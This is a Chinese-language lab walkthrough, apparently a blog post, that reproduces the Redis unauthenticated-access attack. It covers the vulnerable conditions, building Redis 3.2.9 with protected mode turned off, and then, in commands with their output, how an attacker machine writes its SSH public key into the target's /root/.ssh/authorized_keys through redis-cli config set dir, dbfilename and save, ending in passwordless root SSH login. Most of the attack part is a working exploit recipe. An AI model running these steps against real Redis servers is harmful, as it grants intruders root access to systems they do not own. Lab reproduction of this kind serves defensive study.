漏洞的產生條件
(1)redis綁定在 0.0.0.0:6379,且沒有進行添加防火牆規則避免其他非信任來源 ip 訪問等相關安全策略,直接暴露在公網;
(2)沒有設置密碼認證(一般爲空),可以免密碼遠程登錄redis服務。
重現環境
- 靶機:
1、centos6.5-32bit,ip地址192.168.10.136
2、redis-3.2.9
(2.1)源碼編譯安裝redis,出現錯誤
In file included from adlist.c:34:
zmalloc.h:50:31: error: jemalloc/jemalloc.h: No such file or directory
zmalloc.h:55:2: error: #error “Newer version of jemalloc required”
編譯 redis 報錯 error: jemalloc/jemalloc.h: No such file or directory
原因是jemalloc重載了Linux下的ANSI C的malloc和free函數。
解決辦法:make時添加參數。
make MALLOC=libc make install mkdir /etc/redis cp redis.conf /etc/redis/
(2.2)redis配置文件
vi /etc/redis/redis.conf
註釋#bind 127.0.0.1
protected-mode 改爲no
protected-mode no
- 攻擊機:
centos6.5-32bit,ip地址192.168.10.172
(1)、生成密鑰對。
ssh-keygen -t rsa
# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
6d:54:ad:98:e8:04:52:47:e4:c3:d3:d5:e7:57:4c:f3 [email protected]
The key’s randomart image is:
+–[ RSA 2048]—-+
| ..o+ oo +.|
| . .+ . o o *|
| . .=.oo . oE|
| o=o . o|
| oS o .|
| .. |
| |
| |
| |
+—————–+
在/root/.ssh/目錄下生成id_rsa(密鑰),id_rsa.pub(公鑰)文件
(2)、將公鑰內容存儲到redis
(echo -e “\n\n”;cat /root/.ssh/id_rsa.pub;echo -e “\n\n”;) | /usr/local/bin/redis-cli -h 192.168.10.136 -x set redis_ssh_test
[root@localhost .ssh]# (echo -e “\n\n”;cat /root/.ssh/id_rsa.pub;echo -e “\n\n”;) | /usr/local/bin/redis-cli -h 192.168.10.136 -x set redis_ssh_test
OK
(3)、redis-cli遠程連接redis,設置存儲路徑,並存儲
/usr/local/bin/redis-cli -h 192.168.10.136
config set dir /root/.ssh 注意:靶機上/root/.ssh目錄必須已經存在,否則設置不成功,提示(error) ERR Changing directory: No such file or directory
192.168.10.136:6379> config set dir /root/.ssh
OK
192.168.10.136:6379> config get dir
1) “dir”
2) “/root/.ssh”
192.168.10.136:6379> config set dbfilename authorized_keys
OK
192.168.10.136:6379> config get dbfilename
1) “dbfilename”
2) “authorized_keys”
192.168.10.136:6379> save
OK
192.168.10.136:6379> exit
- 最後
ssh [email protected],執行後直接連接到靶機。
注意:centos系統ssh免密登錄需要關閉selinux